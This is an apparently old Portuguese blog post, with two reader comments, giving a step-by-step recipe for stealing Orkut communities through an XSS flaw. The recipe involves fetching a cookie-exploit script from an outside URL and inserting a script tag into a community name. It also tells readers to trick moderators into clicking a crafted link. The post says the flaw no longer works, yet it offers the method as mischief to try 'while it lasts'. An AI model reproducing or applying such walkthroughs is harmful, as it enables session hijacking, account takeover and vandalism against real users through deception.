Nova falha para Roubar Comunidades no Orkut

Aviso:Isto já não funciona.


Como roubaram varias comunidades no Orkut :


Ano novo, falhas novas no orkut.
Pouco mais de 1 mês depois de milhares de moderadores caírem como patos em links maliciosos (talvez pela 7a vez em 1 ano), cá estamos com mais um capítulo da novela que nunca termina: a das falhas de programação no Orkut.

Tudo exatamente igual: alguém que deixou de assistir um dvd com a namorada ou de beber uma cervejinha com os amigos pra passar a madrugada procurando uma falha no maior site de relacionamentos do mundo. E quem procura acha. Pelo menos no Orkut.

E pra variar de novo, é mais uma do tipo XSS (cross site scripting), dessas que permitem a transferência das comunidades sem necessidade de senha, tornando o orkut
um grande mau exemplo de como não deve ser a programação de um site envolvendo milhões de pessoas.

Ah, e parece que a moda agora é renomear comunidades gigantescas e deixar milhares de membros emputecidos da vida.
Comunidade do Corinthians virando comunidade São Paulina, ou comunidade como a "Faço do meu scrapbook um chat" ser renomeada para "Faço do meu boquete um show!" são apenas alguns exemplos.

A receitinha de bolo pra você também barbarizar comunidades e aterrorizar moderadores por ai:


1 - Baixe este arquivo em javascript: http://orkutexploits.90megs.com/orkut_cookie_exploit.js.

2 - Altere apenas a segunda linha do arquivo, onde você vai colocar o UID do profile que irá receber as comunidades roubadas.

3 - Hospede este .js no seu hosting favorito e crie um redirecionamento pra ele no site www.lnk.to

4 - Crie uma comunidade no orkut, colocando no nome dela o seguinte: < script src=link >, onde "link" deve ser o redirecionamento que você criou no passo anterior.
Exemplo: < script src=http://lnk.to/teste >

5 - Após criar a comunidade, clique em "adicionar uma comunidade relacionada" e copie o url da página que irá abrir a seguir.
Exemplo:
http://www.orkut.com/CommunitySearch.aspx?cmm=6969

6 - Agora depende da sua lábia. Cole o link acima no scrapbook dos moderadores pelo orkut, usando um bom argumento pra que eles cliquem nele, transferindo assim o controle de todas as suas comunidades pro profile que você configurou no Passo 2.

E não custa lembrar: após rouba-las, não esqueça de devolver as comunidades!

Não se esqueçam de instalar o Firefox , é mais rapido e não se fica vulneravel a este tipo de falhas ...

Divirtam-se enquanto dura :-))

2 comente aqui:

paulinha disse...

Eui nãO entendii nada

V disse...

Nem era pra entender. Só ta aí para demostrar como a coisa funciona (ou funcionou), os paraquedistas adoram isso :-)

Postar um comentário

  ©Design by Dicas Blogger.

TOPO